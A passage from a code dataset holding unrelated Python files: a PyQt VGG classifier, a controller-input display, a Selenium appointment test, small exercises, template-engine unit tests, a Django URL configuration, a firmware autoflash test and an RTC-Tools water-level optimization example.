ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# ============================================================================\n#\nimport argparse\nimport json\nimport sys\n\nimport torch\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom PyQt5 import QtWidgets, QtGui\nfrom PyQt5.QtWidgets import *\n\nfrom vgg_pytorch import VGG\nimport torch.npu\nimport os\nNPU_CALCULATE_DEVICE = 0\nif os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):\n    NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))\nif torch.npu.current_device() != NPU_CALCULATE_DEVICE:\n    torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')\n\nparser = argparse.ArgumentParser(\"VGGNet Classifier Tool\")\nparser.add_argument(\"-w\", \"--model_name\", type=str, default='vgg11',\n                    help=\"Weight of the model loaded by default.\")\nparser.add_argument(\"-s\", \"--image_size\", type=int, default=None,\n                    help=\"Size of classified image. (default=None).\")\nparser.add_argument(\"-l\", \"--labels_map\", type=str, default=\"./labels_map.txt\",\n                    help=\"Image tag. 
(default='./labels_map.txt').\")\nparser.add_argument(\"-n\", \"--num_classes\", type=int, default=1000,\n                    help=\"Number of categories of images. (default=1000).\")\nparser.add_argument(\"-p\", \"--echo\", type=bool, default=False,\n                    help=\"Show pop ups or not? (default: False)\")\nargs = parser.parse_args()\n\n\ndef classifier(image_path):\n    # Open image\n    img = Image.open(image_path)\n    img = tfms(img).unsqueeze(0)\n\n    # Classify with VGGNet\n    with torch.no_grad():\n        logits = model(img)\n    preds = torch.topk(logits, k=1).indices.squeeze(0).tolist()\n\n    for idx in preds:\n        label = labels_map[idx]\n        probability = torch.softmax(logits, dim=1)[0, idx].item()\n        return label, probability\n\n\nclass Picture(QWidget):\n    def __init__(self):\n        super(Picture, self).__init__()\n\n        self.resize(1000, 1000)\n        self.setWindowTitle(\"Classifier tool\")\n\n        self.label = QLabel(self)\n        self.label.setFixedSize(args.image_size, args.image_size)\n        self.label.move(300, 300)\n        self.label.setStyleSheet(\n            \"QLabel{background:white;}\"\n            \"QLabel{color:rgb(0,0,0);font-size:18px;font-weight:bold;font-family:宋体;}\"\n        )\n\n        # add open image button\n        self.btn_open_img = QPushButton(self)\n        self.btn_open_img.setText(\"Open image\")\n        self.btn_open_img.move(10, 30)\n        self.btn_open_img.clicked.connect(self.openimage)\n\n        # add open popup window button\n        self.btn_open_popup_window = QPushButton(self)\n        self.btn_open_popup_window.setText(\"open popup window\")\n        self.btn_open_popup_window.move(10, 200)\n        self.btn_open_popup_window.clicked.connect(self.open_popup_window)\n\n        # add close popup window button\n        self.btn_close_popup_window = QPushButton(self)\n        self.btn_close_popup_window.setText(\"close popup window\")\n        self.btn_close_popup_window.move(10, 300)\n        self.btn_close_popup_window.clicked.connect(self.close_popup_window)\n\n    @staticmethod\n    def open_popup_window():\n        args.echo = True\n\n    @staticmethod\n    def close_popup_window():\n        args.echo = False\n\n    def openimage(self):\n        img_name, _ = QFileDialog.getOpenFileName(self, \"Open image\", \"\", \"*.jpg;;*.png;;All Files(*)\")\n        img = QtGui.QPixmap(img_name).scaled(args.image_size, args.image_size)\n        self.label.setPixmap(img)\n        text, prob = classifier(img_name)\n        print(\"------------------------------\")\n        print(f\"Label: {text:<75}\")\n        print(f\"Probability: {prob:.6f}.\")\n        print(\"------------------------------\")\n        if args.echo:\n            self.echo(str(text), prob)\n\n    def echo(self, text, prob):\n        QMessageBox.information(\n            self, \"Message\",\n            f\"Label :{str(text):<75}\\nProbability: {prob:.6f}\")\n\n\nif __name__ == \"__main__\":\n    model = VGG.from_pretrained(args.model_name)\n    model.eval()\n    if args.image_size is None:\n        args.image_size = VGG.get_image_size(args.model_name)\n    # Preprocess image\n    tfms = transforms.Compose([\n        transforms.Resize(args.image_size),\n        transforms.CenterCrop(args.image_size),\n        transforms.ToTensor(),\n        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n    ])\n\n    # Load class names\n    labels_map = json.load(open(args.labels_map))\n    labels_map = [labels_map[str(i)] for i in range(args.num_classes)]\n\n    app = QtWidgets.QApplication(sys.argv)\n    my = Picture()\n    my.show()\n    sys.exit(app.exec_())\n","sub_path":"PyTorch/dev/cv/image_classification/VGGNet_ID0400_for_PyTorch/examples/simple/qt.py","file_name":"qt.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"347876431","text":"\"\"\"\nController display (shows what inputs are used) 
for Logitech F310 using the DPad on Ubuntu 18.04.\n\"\"\"\n\nimport evdev\nimport curses\n\ndevice_name = \"/dev/input/event12\"\ndevice = evdev.InputDevice(device_name)\n\n# # Dicts for user reference. I don't use the values these explicitly in code.\n#\n# BTN_DICT = {\n# 304: \"A\",\n# 305: \"B\",\n# 307: \"Y\",\n# 308: \"X\",\n# 315: \"STR\",\n# 314: \"SEL\",\n# 310: \"L\",\n# 311: \"R\",\n# }\n#\n# DIRECTION_DICT = {(17, 1): \"D\", (17, -1): \"U\", (16, -1): \"L\", (16, 1): \"R\"}\n\nCONTROLLER_ASCII = \"\"\"\n +---------------------------+\n | ^ SEL STR Y |\n | < > X B |\n | v A |\n +---------------------------+\n\"\"\"\n\nCONTROLLER_ASCII_LOCATION_LOOKUP = {\n \"btn\": {\n 304: [(4, 24), \"A\"],\n 305: [(3, 26), \"B\"],\n 307: [(3, 22), \"X\"],\n 308: [(2, 24), \"Y\"],\n 315: [(2, 16), \"STR\"],\n 314: [(2, 11), \"SEL\"],\n # 310: [(2, 22), \"L\"],\n # 311: [(2, 22), \"R\"],\n },\n \"dpad\": {\n 17: {1: [(4, 5), \"v\"], -1: [(2, 5), \"^\"]},\n 16: {-1: [(3, 3), \"<\"], 1: [(3, 7), \">\"]},\n },\n}\n\n# The controller saves the axis, but not the pole.\nlast_direction_value = []\n\n\ndef main(stdscr):\n curses.start_color()\n\n # Default coloring\n curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)\n\n # Coloring for the dpad.\n curses.init_pair(2, curses.COLOR_MAGENTA, curses.COLOR_BLACK)\n\n # Coloring for A, B, X, Y\n curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK)\n curses.init_pair(4, curses.COLOR_RED, curses.COLOR_BLACK)\n curses.init_pair(5, curses.COLOR_BLUE, curses.COLOR_BLACK)\n curses.init_pair(6, curses.COLOR_YELLOW, curses.COLOR_BLACK)\n\n # Hides the cursor.\n curses.curs_set(0)\n\n # Init the ASCII image.\n stdscr.clear()\n stdscr.addstr(0, 0, CONTROLLER_ASCII, curses.color_pair(1))\n stdscr.refresh()\n\n def redraw_buttons(event_code, press=True):\n \"\"\"\n Redraws buttons excluding the D-pad; also adds color.\n \"\"\"\n\n button_to_curses_color_idx = {304: 6, 305: 4, 307: 3, 308: 5, 315: 2, 314: 2}\n\n val = CONTROLLER_ASCII_LOCATION_LOOKUP[\"btn\"][event_code]\n x, y = val[0]\n color = (\n curses.color_pair(button_to_curses_color_idx[event_code])\n if press\n else curses.color_pair(1)\n )\n stdscr.addstr(x, y, val[1], color)\n stdscr.refresh()\n\n def redraw_dpad(event_code, event_value, press=True):\n \"\"\"controller_display\n Redraws D-pad values.\n \"\"\"\n\n val = CONTROLLER_ASCII_LOCATION_LOOKUP[\"dpad\"][event_code][event_value]\n x, y = val[0]\n color = curses.color_pair(4) if press else curses.color_pair(1)\n stdscr.addstr(x, y, val[1], color)\n stdscr.refresh()\n\n def parse_buttons(event):\n \"\"\"\n Parses if a button is pressed or not, and what to do in each case.\n \"\"\"\n try:\n if event.value == 1: # if pressed...\n redraw_buttons(event.code, press=True)\n else:\n redraw_buttons(event.code, press=False)\n except Exception as e:\n pass\n\n def parse_dpad(event):\n \"\"\"\n Parses if the D-pad is pressed or not, and what to do in each case.\n \"\"\"\n\n global last_direction_value\n try:\n if event.value != 0: # if pressed...\n last_direction_value.append(event.value)\n redraw_dpad(event.code, event.value, press=True)\n\n else:\n for dir_val in last_direction_value:\n redraw_dpad(event.code, dir_val, press=False)\n except Exception as e:\n pass\n\n # Main loop; Parses if the button pressed is\n # the D-pad or a button (X, Y, A, B, etc.)\n for event in device.read_loop():\n if event.type == 1:\n parse_buttons(event)\n if event.type == 3:\n parse_dpad(event)\n\n\nif __name__ == \"__main__\":\n 
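# (Added, hedged note, not part of the original script.) The read loop in\n    # main() dispatches on bare event-type numbers; 1 and 3 are the standard\n    # Linux input constants EV_KEY and EV_ABS, which the evdev package also\n    # exposes by name. A sketch of the same dispatch using evdev.ecodes,\n    # assuming the standard evdev API:\n    #\n    #     if event.type == evdev.ecodes.EV_KEY:    # key/button events (== 1)\n    #         parse_buttons(event)\n    #     elif event.type == evdev.ecodes.EV_ABS:  # absolute axes / D-pad (== 3)\n    #         parse_dpad(event)\n    #\n    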
curses.wrapper(main)\n","sub_path":"snes_controller_display.py","file_name":"snes_controller_display.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"405165092","text":"import unittest\r\nimport csv, operator\r\nimport smtplib\r\nfrom pyunitreport import HTMLTestRunner\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.select import Select\r\n\r\n#unit tests\r\n#Cases of test\r\nclass NewAppoiment(unittest.TestCase):\r\n @classmethod\r\n def setUpClass(self):\r\n self.driver = webdriver.Chrome(executable_path= r'./chromedriver.exe')\r\n driver = self.driver\r\n driver.maximize_window()\r\n driver.implicitly_wait(10)\r\n\r\n def test_new_appoiment(self):\r\n driver = self.driver\r\n driver.get('https://semindigital.com/')\r\n driver.implicitly_wait(10) \r\n\r\n lista = []\r\n with open('data.csv') as data:\r\n entrada = csv.reader(data)\r\n lista = list (entrada)\r\n x=0\r\n for linea in lista:\r\n #print(linea)\r\n #print (\"Iteracion \" , x)\r\n if(x==0):\r\n x=x+1 \r\n else:\r\n correo = linea [0]\r\n contrasena = linea [1]\r\n # cie10 = linea [2]\r\n estudio = linea [3]\r\n tipo_cita = linea [4]\r\n costo = linea [5]\r\n fecha_estudio = linea [6]\r\n hora_i = linea [7]\r\n hora_f = linea [8]\r\n telefono = linea [9]\r\n\r\n # Login\r\n email = driver.find_element_by_id ('email')\r\n password = driver.find_element_by_id('password')\r\n \r\n self.assertTrue(email.is_enabled() \r\n and password.is_enabled())\r\n\r\n email.send_keys(correo)\r\n password.send_keys(contrasena)\r\n \r\n driver.find_element_by_xpath('//*[@id=\"login\"]/div/div/div[2]/form/div[3]/div/div/button').click()\r\n driver.implicitly_wait(2)\r\n\r\n # Button new appoiment\r\n driver.find_element_by_xpath('//*[@id=\"container-princ\"]/app-medico/div[1]/div[1]/div[1]/button[1]').click()\r\n \r\n # New appoiment\r\n # Study to be carried out\r\n new_appoiment = driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/form/input[1]')\r\n new_appoiment.clear()\r\n new_appoiment.send_keys(estudio)\r\n\r\n # Select appoiment type\r\n select_appoiment = Select(driver.find_element_by_id('tipo')) \r\n select_appoiment.select_by_visible_text(tipo_cita)\r\n\r\n # Cost\r\n cost = driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/form/input[2]')\r\n cost.clear()\r\n cost.send_keys(costo)\r\n\r\n # Date\r\n date = driver.find_element_by_id('date')\r\n date.send_keys(fecha_estudio)\r\n \r\n # Start Time\r\n start_time = driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/form/input[4]')\r\n start_time.send_keys(hora_i)\r\n\r\n # final time\r\n final_time = driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/form/input[5]')\r\n final_time.send_keys(hora_f)\r\n\r\n # Phone\r\n phone = driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/form/div/input[1]')\r\n phone.send_keys(telefono)\r\n\r\n self.assertTrue(new_appoiment.is_enabled()\r\n and cost.is_enabled()\r\n and date.is_enabled()\r\n and start_time.is_enabled()\r\n and final_time.is_enabled()\r\n and phone.is_enabled())\r\n\r\n # Button appoiment\r\n driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[2]/div/button[2]').click()\r\n\r\n # Button return\r\n driver.find_element_by_xpath('/html/body/ngb-modal-window/div/div/div[1]/button').click()\r\n\r\n # Get out\r\n 
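# (Added, hedged note, not part of the original test.) Absolute XPaths like\r\n                # the ones used throughout this script break whenever the page layout\r\n                # shifts. A sturdier locator targets a stable attribute; a sketch,\r\n                # assuming a hypothetical id of 'logout' on the element and the same\r\n                # selenium 3 API already used here:\r\n                #\r\n                #     driver.find_element_by_css_selector('#logout').click()\r\n                #\r\n                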
driver.find_element_by_xpath('//*[@id=\"body\"]/header/div/div[2]/a/div').click()\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    unittest.main(verbosity = 2, testRunner = HTMLTestRunner(output= 'reportes',report_name= 'Nueva cita')) \r\n","sub_path":"Medico/new_appoiment.py","file_name":"new_appoiment.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"434838407","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\n\n#START HERE BELOW\n\nn = input(\"Digite o número: \")\na=[]\nfor i in range(0, n, 1):\n    a.append(input(\"Digite um valor: \"))\nsoma = 0\n\n#list indices run from 0 to n-1, so start at 0 (a[n] does not exist)\nfor i in range (0,n,1):\n    soma=soma+(a[i]**2)\nprint (soma)\n    ","sub_path":"moodledata/vpl_data/10/usersdata/64/23063/submittedfiles/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"234655277","text":"class Solution:\n    def removeElement(self, nums, val):\n        \"\"\"\n        :type nums: List[int]\n        :type val: int\n        :rtype: List[int] (this variant returns the trimmed list, not its length)\n        \"\"\"\n        # nums.index(val) raises ValueError when val is absent, so guard first;\n        # this also handles the single-element list correctly\n        if val not in nums:\n            return nums\n        nums = sorted(nums)\n        index = nums.index(val)\n        j = index\n        while j < len(nums) and nums[j] == nums[index]:\n            j += 1\n        if j == len(nums):\n            return nums[:index]\n        while j < len(nums):\n            nums[index] = nums[j]\n            j += 1\n            index += 1\n        return nums[:index]\n\n\"\"\"\nError Message:\n\n\"\"\"\n\n\n\"\"\"\nOther's answer:\n\nclass Solution:\n    def removeElement(self, nums, val):\n        start, end = 0, len(nums) - 1\n        while start <= end:\n            if nums[start] == val:\n                nums[start], nums[end], end = nums[end], nums[start], end - 1\n            else:\n                start +=1\n        return start\n\"\"\"","sub_path":"27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"108958301","text":"\"\"\" Tests for pork.py, a yaml+templates generator \"\"\"\n\nimport os, sys\nimport unittest\n\n# keep the command name hanging around, and add the pork directory\n# to the path so we can import it\nme = sys.argv[0]\nbase = os.path.split(__file__)[0]\nsys.path.insert(0,os.path.join(base,'..'))\nimport pork\n\n\nclass TestPork(unittest.TestCase):\n    \"\"\" Test suite for pork. This will never be complete. \"\"\"\n    def setUp(self):\n        # set up the engines - we won't bother testing the engines which\n        # aren't installed, so let's just try to import the root namespace\n        # and see what happens\n        self.engines = {}\n        for engine in pork.engines:\n            # special case this one. python would mean 'import string' and,\n            # frankly, if that doesn't work then all bets are off\n            if engine == 'python':\n                continue\n            # GRR why are they using uppercase module names? I thought python\n            # was meant to be pythonic? I wish it _enforced_ things rather than\n            # had conventions. Programming languages allow for too much\n            # freedom of expression of preference, style over substance.\n            # I hate how much development time is wasted in teams just by\n            # the need to discuss \"coding standards\". Someone one day will make\n            # a language that can only be written one way, and then the only\n            # things open to debate will be the quality of algorithm, approach,\n            # pattern, etc. 
But hopefully by then I won't be programming for a\n # living anyway.\n if engine == 'cheetah':\n engine = 'Cheetah'\n try:\n __import__(engine)\n except ImportError:\n pass\n else:\n self.engines[engine] = True\n # default config dictionary which the tests will update\n # before calling render\n self.config = {'engine':'python'}\n self.generated_files = []\n def tearDown(self):\n \"\"\" Remove generated files \"\"\"\n for file in self.generated_files:\n try:\n os.remove(file)\n except OSError:\n pass\n def render(self, values={}):\n \"\"\" Helper: render a dictionary against the default config \"\"\"\n # set up the renderer so it can be used afterwards (for spitting)\n self.renderer = pork.Renderer(self.config, values)\n return self.renderer.render()\n def slurp(self, file):\n \"\"\" Helper: read an entire file in \"\"\"\n return open(file, \"r\").read()\n def testPorkCanBeUsedToDoLiterallyNothing(self):\n \"\"\" Can Pork be used to do nothing at all? \"\"\"\n\t # this template has no tags in it, therefore the output\n\t # should match the input. passthroughs for the win.\n template = \"%s/no-tags.txt\" % base\n self.config['template']=template\n input = self.slurp(template)\n output = self.render()\n self.assertEqual(input, output)\n def testPorkCanBeUsedJustToCopyFilesIfYouReallyWant(self):\n \"\"\" Can Pork be used just to copy a file from A to B? \"\"\"\n # repeat the above test, but have a target file as well\n self.config['target'] = \"%s/no-tags-output.txt\" % base\n self.testPorkCanBeUsedToDoLiterallyNothing()\n self.renderer.spit()\n # this variable was setup in the test case we just called\n input = self.slurp(self.config['template'])\n output = self.slurp(self.config[\"target\"])\n self.assertEqual(input, output)\n self.generated_files.append(self.config[\"target\"])\n def testDjangoVariableInterpolation(self):\n \"\"\" Does (simple) django variable interpolation work? \"\"\"\n if 'django' in self.engines:\n self.config['template'] = \"%s/django-simple.txt\" % base\n self.config.update({'engine': 'django'})\n output = self.render({'world': 'everyone'})\n expected = \"Hello, everyone.\\n\"\n self.assertEqual(expected, output)\n def testJinja2VariableInterpolation(self):\n \"\"\" Does (simple) Jinja2 variable interpolation work? \"\"\"\n if 'jinja2' in self.engines:\n self.config['template'] = \"%s/jinja2-simple.txt\" % base\n self.config.update({'engine': 'jinja2'})\n output = self.render({'world': 'everyone'})\n # jinja2 strips off the trailing newline\n expected = \"Hello, everyone.\"\n self.assertEqual(expected, output)\n def testMakoVariableInterpolation(self):\n \"\"\" Does (simple) Mako variable interpolation work? \"\"\"\n if 'mako' in self.engines:\n self.config['template'] = \"%s/mako-simple.txt\" % base\n self.config.update({'engine': 'mako'})\n output = self.render({'world': 'everyone'})\n expected = \"Hello, everyone.\\n\"\n self.assertEqual(expected, output)\n def testStringDotTemplateVariableInterpolation(self):\n \"\"\" Does (simple) python variable interpolation work? \"\"\"\n self.config['template'] = \"%s/python-simple.txt\" % base\n # no need to set the engine, python's the default\n output = self.render({'world': 'everyone'})\n expected = \"Hello, everyone.\\n\"\n self.assertEqual(expected, output)\n def testCheetahVariableInterpolation(self):\n \"\"\" Does (simple) Cheetah variable interpolation work? 
\"\"\"\n # see rant in setUp for why Cheetah starts with a capital C\n if 'Cheetah' in self.engines:\n self.config['template'] = \"%s/cheetah-simple.txt\" % base\n output = self.render({'world': 'everyone'})\n expected = \"Hello, everyone.\\n\"\n self.assertEqual(expected, output)\n def testWastedTimeHasBeenWasted(self):\n \"\"\" Is Darren bored of writing tests to prove what he already knows?\"\"\"\n r1 = \"Test cases: for engineers with no confidence in their code,\"\n r2 = \"and managers with no trust in their engineers. Ridiculous.\"\n self.assertEqual(len(r1), len(r2))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"412513623","text":"\"\"\"PixelRides URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path,re_path\nfrom django.conf.urls import url, include\nfrom .views import *\nfrom userData import views\nfrom django.conf import settings \nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',welcomeAnimation, name=\"welcome\"),\n path('home/', landingPage, name=\"home\"),\n path('about/',about, name=\"about\"),\n path('chooseRide/',chooseRide, name=\"rides\"),\n path('closeContacts/',closeContacts, name=\"closeContacts\"),\n path('dashboard/',dashboard,name=\"dashboard\"),\n path('user/',user,name=\"user\"),\n path('wallet/',wallet,name=\"wallet\"),\n path('security/',security,name=\"security\"),\n path('locateMe/',locateMe,name=\"locateMe\"),\n path('notifications/',notifications,name=\"notifications\"),\n path('faq/',faq,name=\"faq\"),\n\tpath('checkRides/', checkRides, name=\"checkrides\"),\n path('upgrade/',upgrade,name=\"upgrade\"),\n path('chooseDriver/',chooseDriver,name=\"chooseDriver\"),\n\tpath('setBargain/',setBargain,name=\"setBargain\"),\n\tpath('getBargain/',getBargain,name=\"getBargain\"),\n\tpath('agreeRide/',agreeRide,name=\"agreeRide\"),\n\tpath('disagreeRide/',disagreeRide,name=\"disagreeRide\"),\n\tpath('checkAgreeRide/',checkAgreeRide,name=\"checkAgreeRide\"),\n\tpath('schedule/',scheduleRide,name=\"schedule_rides\"),\n\turl(r'pay/(?P\\w+?)/(?P\\w+?)/$',pay,name=\"pay\"),\n\turl(r'bargain/(?P\\w+?)/$',bargaining, name=\"bargain\"),\n\turl(r'rideOn/(?P\\w+?)/(?P\\w+?)/$',rideOn,name=\"rideOn\"),\n\turl(r'forgotPassword/(?P\\w+?)/(?P\\w+?)/$', forgotPassword, name=\"forgotPassword\"),\n\turl(r'addingStops/(?P\\w+?)/(?P\\w+?)/$',addingStops,name=\"addingStops\"),\n url(r'confirmTransaction/(?P\\w+?)/(?P\\w+?)/(?P\\w+?)/$',confirmTransaction,name=\"confirmTransaction\"),\n url(r'^userData/',include('userData.urls')),\n url(r'^logout/$', views.user_logout, name='logout'),\n url(r'verifyOtp/(?P\\w+?)/(?P\\w+?)/(?P\\w+?)/(?P\\w+?)/$', otpAuthentication, name=\"otp\"),\n]\n\nif settings.DEBUG:\n urlpatterns 
+= static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)","sub_path":"PixelRides/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"516398031","text":"# -*- coding: utf-8 -*-\nimport redis\n\nclass Subscribe(object):\n\n def __init__(self):\n rc = redis.Redis(host='127.0.0.1')\n ps = rc.pubsub()\n ps.subscribe(['foo', 'bar'])\n rc.publish('foo', 'hello world')\n","sub_path":"azeroth_spider/subscribe/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"235797778","text":"'''\n*******************************************************************************\n Copyright 2013 EMC Inc.\n\n[Filename]: tc_uefi_ms_AutoflashMfg.py\n[Author ]: Frank.He@emc.com\n[Purpose ]: Autoflash script for update SPA and SPB\n[Contains]: \n tc_uefi_ms_AutoflashMfg - class\n __init__\n test\n[History ]:\n******************************************************************************\n VER NAME DATE COMMENT\n******************************************************************************\n R00 Frank He 2/18/2014 Initial edition\n******************************************************************************\n'''\nfrom case.CBaseCase import *\n\nclass tc_uefi_ms_AutoflashMfg(CBaseCase):\n \n \"\"\"\n******************************************************************************\n[Purpose ]: Autoflash script for update SPA and SPB\n[Author ]: Frank.He@emc.com\n[Method ]:\n[ReqID ]: \n[Sprint ]: ATOM 2.0.13\n[Ticket ]: ATOM-970\n[Platform]: All\n[Type ]: Auto\n******************************************************************************\n \"\"\"\n def __init__(self):\n CBaseCase.__init__(self, self.__class__.__name__)\n\n\n def test(self):\n \n if self.enclosure.spa.go_to_post() != 0:\n self.result(FAIL, 'SPA: fail to go to post')\n return\n if self.enclosure.spa.auto_flash(self.obj_release.image_files_full_path()) != 0:\n self.log('ERROR','SPA: fail to auto flash')\n self.result(FAIL, 'SPA: fail to auto flash')\n \n if self.enclosure.spb.go_to_post() != 0:\n self.result(FAIL, 'SPB: fail to go to post')\n return\n if self.enclosure.spb.auto_flash(self.obj_release.image_files_full_path()) != 0:\n self.log('ERROR','SPB: fail to auto flash')\n self.result(FAIL, 'SPB: fail to auto flash')\n\n\n\n\n","sub_path":"case/OUT_OF_DATE/tc_uefi_ms_AutoflashMfg.py","file_name":"tc_uefi_ms_AutoflashMfg.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"216407990","text":"import numpy as np\n\n\nfrom datetime import datetime\n\n\n\nfrom rtctools.optimization.collocated_integrated_optimization_problem \\\n import CollocatedIntegratedOptimizationProblem\nfrom rtctools.optimization.csv_mixin import CSVMixin\nfrom rtctools.optimization.goal_programming_mixin \\\n import Goal, GoalProgrammingMixin, StateGoal\nfrom rtctools.optimization.modelica_mixin import ModelicaMixin\nfrom rtctools.util import run_optimization_problem\n\n\nclass WaterLevelRangeGoal(StateGoal):\n # Applying a state goal to every time step is easily done by defining a goal\n # that inherits StateGoal. 
StateGoal is a helper class that uses the state\n # to determine the function, function range, and function nominal\n # automatically.\n state = 'storage.HQ.H'\n # One goal can introduce a single or two constraints (min and/or max). Our\n # target water level range is 0.43 - 0.44. We might not always be able to\n # realize this, but we want to try.\n\n\n\n data_path = \"./input/timeseries_import.csv\"\n results = np.recfromcsv(data_path, encoding=None)\n\n month = datetime.strptime(results[\"utc\"][0], \"%Y-%m-%d %H:%M:%S\").month\n day = datetime.strptime(results[\"utc\"][0], \"%Y-%m-%d %H:%M:%S\").day\n\n print('>>>> StateGoal >>>> Month: ', month)\n print('>>>> StateGoal >>>> Day: ', day)\n\n reserve = 0.0\n if(month > 5):\n reserve = 0.02\n\n target_min = 0.43 + reserve\n target_max = 0.44 + reserve\n\n # Because we want to satisfy our water level target first, this has a\n # higher priority (=lower number).\n\n priority = 1\n\n\nclass MinimizeQpumpGoal(Goal):\n # This goal does not use a helper class, so we have to define the function\n # method, range and nominal explicitly. We do not specify a target_min or\n # target_max in this class, so the goal programming mixin will try to\n # minimize the expression returned by the function method.\n def function(self, optimization_problem, ensemble_member):\n return optimization_problem.integral('Q_pump')\n\n # The nominal is used to scale the value returned by\n # the function method so that the value is on the order of 1.\n function_nominal = 100.0\n # The lower the number returned by this function, the higher the priority.\n priority = 2\n # The penalty variable is taken to the order'th power.\n order = 1\n\n\nclass MinimizeChangeInQpumpGoal(Goal):\n # To reduce pump power cycles, we add a third goal to minimize changes in\n # Q_pump. This will be passed into the optimization problem as a path goal\n # because it is an an individual goal that should be applied at every time\n # step.\n def function(self, optimization_problem, ensemble_member):\n return optimization_problem.der('Q_pump')\n function_nominal = 5.0\n priority = 3\n # Default order is 2, but we want to be explicit\n order = 2\n\n\nclass Example(GoalProgrammingMixin, CSVMixin, ModelicaMixin,\n CollocatedIntegratedOptimizationProblem):\n \"\"\"\n An introductory example to goal programming in RCT-Tools\n \"\"\"\n def path_constraints(self, ensemble_member):\n # We want to add a few hard constraints to our problem. The goal\n # programming mixin however also generates constraints (and objectives)\n # from on our goals, so we have to call super() here.\n constraints = super().path_constraints(ensemble_member)\n\n # data_path = \"./input/timeseries_import.csv\"\n # results = np.recfromcsv(data_path, encoding=None)\n #\n # month = datetime.strptime(results[\"utc\"][0], \"%Y-%m-%d %H:%M:%S\").month\n\n # print(\"////// path_constraints --------- Month: \", month)\n\n # Release through orifice downhill only. This constraint enforces the\n # fact that water only flows downhill\n constraints.append((self.state('Q_orifice') +\n (1 - self.state('is_downhill')) * 10, 0.0, 10.0))\n\n # Make sure is_downhill is true only when the sea is lower than the\n # water level in the storage.\n M = 2 # The so-called \"big-M\"\n constraints.append((self.state('H_sea') - self.state('storage.HQ.H') -\n (1 - self.state('is_downhill')) * M, -np.inf, 0.0))\n constraints.append((self.state('H_sea') - self.state('storage.HQ.H') +\n self.state('is_downhill') * M, 0.0, np.inf))\n\n # Orifice flow constraint. 
Uses the equation:\n # Q(HUp, HDown, d) = width * C * d * (2 * g * (HUp - HDown)) ^ 0.5\n # Note that this equation is only valid for orifices that are submerged\n # units: description:\n w = 3.0 # m width of orifice\n d = 0.8 # m hight of orifice\n C = 1.0 # none orifice constant\n g = 9.8 # m/s^2 gravitational acceleration\n constraints.append(\n (((self.state('Q_orifice') / (w * C * d)) ** 2) / (2 * g) +\n self.state('orifice.HQDown.H') - self.state('orifice.HQUp.H') -\n M * (1 - self.state('is_downhill')),\n -np.inf, 0.0))\n\n return constraints\n\n def goals(self):\n return [MinimizeQpumpGoal()]\n\n def path_goals(self):\n # Sorting goals on priority is done in the goal programming mixin. We\n # do not have to worry about order here.\n return [WaterLevelRangeGoal(self), MinimizeChangeInQpumpGoal()]\n\n def pre(self):\n # Call super() class to not overwrite default behaviour\n super().pre()\n # We keep track of our intermediate results, so that we can print some\n # information about the progress of goals at the end of our run.\n self.intermediate_results = []\n\n def priority_completed(self, priority):\n # We want to show that the results of our highest priority goal (water\n # level) are remembered. The other information we want to see is how our\n # lower priority goal (Q_pump) progresses. We can write some code that\n # sumerizes the results and stores it.\n\n # A little bit of tolerance when 